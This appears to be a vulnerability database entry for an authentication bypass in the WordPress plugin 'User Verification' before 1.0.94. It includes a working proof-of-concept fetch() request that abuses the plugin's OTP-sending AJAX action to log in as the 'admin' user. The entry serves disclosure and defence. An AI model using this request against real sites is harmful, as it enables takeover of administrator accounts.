User Verification < 1.0.94 - Authentication Bypass

2022-12-2800:00:00

Lana Codes

282

user verification

authentication bypass

exploit

fetch

headers

post

content-type

form-urlencoded

otp

EPSS

0.004

Percentile

72.7%

JSON

The plugin was affected by an Auth Bypass security vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrative role on the website.

Exploit:

fetch('http://localhost:10008/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=user_verification_send_otp&user_login=admin'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

References

lana.codes/lanavdb/eeabe1d3-6f64-400a-8fb2-0865efdf6957

EPSS

0.004

Percentile

72.7%

JSON

Related for WPEX-ID:1EEE10A8-135F-4B76-8289-C381FF1F51EA